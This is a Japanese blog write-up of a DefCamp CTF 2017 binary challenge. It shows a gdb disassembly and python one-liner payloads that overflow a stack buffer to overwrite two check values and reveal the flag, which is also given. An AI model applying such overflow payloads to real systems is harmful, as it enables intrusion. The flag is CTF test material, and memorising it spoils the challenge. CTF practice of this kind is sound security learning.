下から上に行く

新卒エンジニアが書くブログです

初のWrite Up書いてみる

最近内定式や卒研で忙しくて何もできていなかったので初のWrite Upを書きます!!

この前チームで参加したDefCamp CTF Qualification 2017の問題のWrite Upです。

How is your memory?

問題からファイルをダウンロードしてみるとmemory.pcapが手に入った
pcapだったのでwiresharkで見てみるとELFという文字が見えたのでfileで確かめてみた

$ file memory.pcap
memory.pcap: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ffa14db28a5fdf190ee6b0b56af2c7b2cab9cdd5, not stripped

ELFだった、、、

早速動かしてみる

$ ./memory.pcap 


Oh well you do remember your extension!

[You have sent this msg]: 

[Instead of 0xdeadbeef the target recived]: 0x4030201

なにも入力しないとこんな感じだった。
次はなにか入力してみる

./memory.pcap 
AAAAAAAAAAA

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAA

[Instead of 0xdeadbeef the target recived]: 0x4030201

自分が入力した値が表れた
さらに入力してみる

$ ./memory.pcap 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Instead of 0xdeadbeef the target recived]: 0x41414141

Hey hey do not spam! Go home you are drunk!

今まで0x4030201だったのが0x41414141に書き換わっている つまり入力した値で書き換わった。

次は中身を解析してみる。

$ gdb -q ./memory.pcap 
Reading symbols from ./memory.pcap...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x080486bb <+0>:   lea    ecx,[esp+0x4]
   0x080486bf <+4>:   and    esp,0xfffffff0
   0x080486c2 <+7>:   push   DWORD PTR [ecx-0x4]
   0x080486c5 <+10>:  push   ebp
   0x080486c6 <+11>:  mov    ebp,esp
   0x080486c8 <+13>:  push   ecx
   0x080486c9 <+14>:  sub    esp,0x64
   0x080486cc <+17>:  mov    DWORD PTR [ebp-0xc],0x4030201
   0x080486d3 <+24>:  mov    eax,ds:0x804a040
   0x080486d8 <+29>:  sub    esp,0x4
   0x080486db <+32>:  push   eax
   0x080486dc <+33>:  push   0x2d
   0x080486de <+35>:  lea    eax,[ebp-0x34]
   0x080486e1 <+38>:  push   eax
   0x080486e2 <+39>:  call   0x80484f0 <fgets@plt>
   0x080486e7 <+44>:  add    esp,0x10
   0x080486ea <+47>:  sub    esp,0xc
   0x080486ed <+50>:  push   0x8048950
   0x080486f2 <+55>:  call   0x8048540 <puts@plt>
   0x080486f7 <+60>:  add    esp,0x10
   0x080486fa <+63>:  sub    esp,0x8
   0x080486fd <+66>:  lea    eax,[ebp-0x34]
   0x08048700 <+69>:  push   eax
   0x08048701 <+70>:  push   0x804897c
   0x08048706 <+75>:  call   0x8048530 <printf@plt>
   0x0804870b <+80>:  add    esp,0x10
   0x0804870e <+83>:  sub    esp,0x8
   0x08048711 <+86>:  push   DWORD PTR [ebp-0xc]
   0x08048714 <+89>:  push   0x804899c
   0x08048719 <+94>:  call   0x8048530 <printf@plt>
   0x0804871e <+99>:  add    esp,0x10
   0x08048721 <+102>: cmp    DWORD PTR [ebp-0xc],0x4030201
   0x08048728 <+109>: je     0x8048743 <main+136>
   0x0804872a <+111>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x08048731 <+118>: je     0x8048743 <main+136>
   0x08048733 <+120>: sub    esp,0xc
   0x08048736 <+123>: push   0x80489cc
   0x0804873b <+128>: call   0x8048540 <puts@plt>
   0x08048740 <+133>: add    esp,0x10
   0x08048743 <+136>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x0804874a <+143>: jne    0x8048865 <main+426>
   0x08048750 <+149>: sub    esp,0xc
   0x08048753 <+152>: push   0x80489fc
   0x08048758 <+157>: call   0x8048530 <printf@plt>
   0x0804875d <+162>: add    esp,0x10
   0x08048760 <+165>: mov    DWORD PTR [ebp-0xc],0xffffff
   0x08048767 <+172>: sub    esp,0x8
   0x0804876a <+175>: lea    eax,[ebp-0x34]
   0x0804876d <+178>: push   eax
   0x0804876e <+179>: push   0x8048a64
   0x08048773 <+184>: call   0x8048520 <scanf@plt>
   0x08048778 <+189>: add    esp,0x10
   0x0804877b <+192>: sub    esp,0x8
   0x0804877e <+195>: lea    eax,[ebp-0x34]
   0x08048781 <+198>: push   eax
   0x08048782 <+199>: push   0x804897c
   0x08048787 <+204>: call   0x8048530 <printf@plt>
   0x0804878c <+209>: add    esp,0x10
   0x0804878f <+212>: sub    esp,0x8
   0x08048792 <+215>: push   DWORD PTR [ebp-0xc]
   0x08048795 <+218>: push   0x8048a68
   0x0804879a <+223>: call   0x8048530 <printf@plt>
   0x0804879f <+228>: add    esp,0x10
   0x080487a2 <+231>: cmp    DWORD PTR [ebp-0xc],0xffffff
   0x080487a9 <+238>: je     0x80487c4 <main+265>
   0x080487ab <+240>: cmp    DWORD PTR [ebp-0xc],0x41414242
   0x080487b2 <+247>: je     0x80487c4 <main+265>
   0x080487b4 <+249>: sub    esp,0xc
   0x080487b7 <+252>: push   0x80489cc
   0x080487bc <+257>: call   0x8048540 <puts@plt>
   0x080487c1 <+262>: add    esp,0x10
   0x080487c4 <+265>: cmp    DWORD PTR [ebp-0xc],0x41414242
   0x080487cb <+272>: jne    0x8048865 <main+426>
   0x080487d1 <+278>: mov    DWORD PTR [ebp-0x3e],0x33736461
   0x080487d8 <+285>: mov    DWORD PTR [ebp-0x3a],0x73647177
   0x080487df <+292>: mov    WORD PTR [ebp-0x36],0x78
   0x080487e5 <+298>: mov    DWORD PTR [ebp-0x43],0x46544344
   0x080487ec <+305>: mov    BYTE PTR [ebp-0x3f],0x0
   0x080487f0 <+309>: mov    DWORD PTR [ebp-0x47],0x414853
   0x080487f7 <+316>: mov    DWORD PTR [ebp-0x4b],0x363532
   0x080487fe <+323>: mov    DWORD PTR [ebp-0x5b],0x2168654d
   0x08048805 <+330>: mov    DWORD PTR [ebp-0x57],0x756f5920
   0x0804880c <+337>: mov    DWORD PTR [ebp-0x53],0x61676120
   0x08048813 <+344>: mov    DWORD PTR [ebp-0x4f],0x3f6e69
   0x0804881a <+351>: sub    esp,0xc
   0x0804881d <+354>: push   0x8048a98
   0x08048822 <+359>: call   0x8048540 <puts@plt>
   0x08048827 <+364>: add    esp,0x10
   0x0804882a <+367>: sub    esp,0x4
   0x0804882d <+370>: push   0x8048ac3
   0x08048832 <+375>: lea    eax,[ebp-0x4b]
   0x08048835 <+378>: push   eax
   0x08048836 <+379>: lea    eax,[ebp-0x43]
   0x08048839 <+382>: push   eax
   0x0804883a <+383>: push   0x8048ad1
   0x0804883f <+388>: lea    eax,[ebp-0x3e]
   0x08048842 <+391>: push   eax
   0x08048843 <+392>: push   0x8048ad8
   0x08048848 <+397>: lea    eax,[ebp-0x3e]
   0x0804884b <+400>: push   eax
   0x0804884c <+401>: lea    eax,[ebp-0x4b]
   0x0804884f <+404>: push   eax
   0x08048850 <+405>: lea    eax,[ebp-0x47]
   0x08048853 <+408>: push   eax
   0x08048854 <+409>: lea    eax,[ebp-0x43]
   0x08048857 <+412>: push   eax
   0x08048858 <+413>: push   0x8048adb
   0x0804885d <+418>: call   0x8048530 <printf@plt>
   0x08048862 <+423>: add    esp,0x30
   0x08048865 <+426>: mov    eax,0x0
   0x0804886a <+431>: mov    ecx,DWORD PTR [ebp-0x4]
   0x0804886d <+434>: leave  
   0x0804886e <+435>: lea    esp,[ecx-0x4]
   0x08048871 <+438>: ret

ここらへんを見ると、[ebp - 0xc]が上書きされている、かつ値が0xdeadbeefじゃないときにHey hey do not spam! Go home you are drunk!と出力されるので 上書きしてあげて0xdeadbeefにすればここは通過できそう。

 0x08048721 <+102>:    cmp    DWORD PTR [ebp-0xc],0x4030201
   0x08048728 <+109>: je     0x8048743 <main+136>
   0x0804872a <+111>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x08048731 <+118>: je     0x8048743 <main+136>
   0x08048733 <+120>: sub    esp,0xc
   0x08048736 <+123>: push   0x80489cc
   0x0804873b <+128>: call   0x8048540 <puts@plt>
   0x08048740 <+133>: add    esp,0x10
   0x08048743 <+136>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x0804874a <+143>: jne    0x8048865 <main+426>

やってみる

$ python -c 'print("A"*40 + "\xef\xbe\xad\xde")' | ./memory.pcap

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ�
[Instead of 0xdeadbeef the target recived]: 0xdeadbeef
Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough?
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���
[Instead of 0x41414242 the target recived]: 0xffffff

0xdeadbeefに書き換えてあげたらいけた。
次は同じように0xffffffを0x41414242に書き換えてあげれば良さそう

$python -c 'print("A"*40 + "\xef\xbe\xad\xde" + "A"*40 + "\x42\x42\x41\x41")' | ./memory.pcap

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ�
[Instead of 0xdeadbeef the target recived]: 0xdeadbeef
Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough?
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAA
[Instead of 0x41414242 the target recived]: 0x41414242
Wow I am impressed! Now for the last time:
DCTF{SHA256(ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration)}

flagっぽいのが出た

echo -n "ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration" | sha256sum

フォーマットがDCTF{SHA256}だったので、これで出力したやつがflag

DCTF{33886bb08d43834495866481148c60bbf9b58421d1dd4849865e49fe444366c6}

CTFを本格的に初めてちょうど1ヵ月ぐらいですが、チームのみんなはすごい人ばっかりなので早く追いつきたいですね、、、
毎週チームで大会に参加しているのでまた書こうと思います!!!
では!